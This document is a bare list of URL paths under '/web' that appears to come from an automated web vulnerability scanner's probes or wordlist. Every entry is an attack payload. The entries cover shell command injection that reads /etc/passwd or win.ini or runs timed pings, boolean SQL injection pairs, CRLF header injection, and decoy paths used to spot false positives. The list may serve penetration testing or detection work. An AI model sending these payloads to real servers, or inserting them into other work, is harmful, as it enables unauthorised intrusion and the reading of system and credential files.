/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%3b%20ping%20-c%206%20localhost
/web%3b%20ping%20-c%206%20localhost/
/web%3b%20ping%20-n%206%20localhost
/web%3b%20ping%20-n%206%20localhost/
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%7c%20ping%20-c%206%20localhost
/web%7c%20ping%20-c%206%20localhost/
/web%7c%20ping%20-n%206%20localhost
/web%7c%20ping%20-n%206%20localhost/
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web'%20and%20's'%3d'r
/web'%20and%20's'%3d'r/
/web'%20and%20's'%3d's
/web'%20and%20's'%3d's/
/web'%20and%20't'%3d'r
/web'%20and%20't'%3d'r/
/web'%20and%20't'%3d't
/web'%20and%20't'%3d't/
/web'%20and%205%3d8--
/web'%20and%205%3d8--/
/web'%20and%207%3d5--
/web'%20and%207%3d5--/
/web'%20and%207%3d7--
/web'%20and%207%3d7--/
/web'%20and%208%3d8--
/web'%20and%208%3d8--/
/web/
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_cccccccccc
/web/admin%0auploads%0a/should_not_xist_hhhhhhhhhhh
/web/admin%0auploads%0a/should_not_xist_ooooooooooooo
/web/admin%0auploads%0a/should_not_xist_ssssssssssssss
/web/admin%0auploads%0a/should_not_xist_wwwwwwwwwwwwwww
/web/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy
/web/admin%0auploads%0a/should_not_xist_zzzzzzzzzzzzzzz
/web/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/web/should_not_xist_dddddddddd
/web/should_not_xist_ggggggggggg
/web/should_not_xist_jjjjjjjjjjjj
/web/should_not_xist_kkkkkkkkkkkk
/web/should_not_xist_uuuuuuuuuuuuuu
/web/should_not_xist_xxxxxxxxxxxxxxx
/web/should_not_xist_yyyyyyyyyyyyyyy
/webaa%0d%0aNeww%3a%20Headerr
/webaa%0d%0aNeww%3a%20Headerr%0d%0a
/webaa%0d%0aNeww%3a%20Headerr%0d%0a/
/webaa%0d%0aNeww%3a%20Headerr/
/webxxx%22%20or%20%22s%22%3d%22r
/webxxx%22%20or%20%22s%22%3d%22r/
/webxxx%22%20or%20%22s%22%3d%22s
/webxxx%22%20or%20%22s%22%3d%22s/
/webxxx%22%20or%20%22t%22%3d%22r
/webxxx%22%20or%20%22t%22%3d%22r/
/webxxx%22%20or%20%22t%22%3d%22t
/webxxx%22%20or%20%22t%22%3d%22t/
/webxxx%22%20or%205%3d8--
/webxxx%22%20or%205%3d8--/
/webxxx%22%20or%207%3d5--
/webxxx%22%20or%207%3d5--/
/webxxx%22%20or%207%3d7--
/webxxx%22%20or%207%3d7--/
/webxxx%22%20or%208%3d8--
/webxxx%22%20or%208%3d8--/
/webxxx'%20or%20's'%3d'r
/webxxx'%20or%20's'%3d'r/
/webxxx'%20or%20's'%3d's
/webxxx'%20or%20's'%3d's/
/webxxx'%20or%20't'%3d'r
/webxxx'%20or%20't'%3d'r/
/webxxx'%20or%20't'%3d't
/webxxx'%20or%20't'%3d't/
/webxxx'%20or%205%3d8--
/webxxx'%20or%205%3d8--/
/webxxx'%20or%207%3d5--
/webxxx'%20or%207%3d5--/
/webxxx'%20or%207%3d7--
/webxxx'%20or%207%3d7--/
/webxxx'%20or%208%3d8--
/webxxx'%20or%208%3d8--/
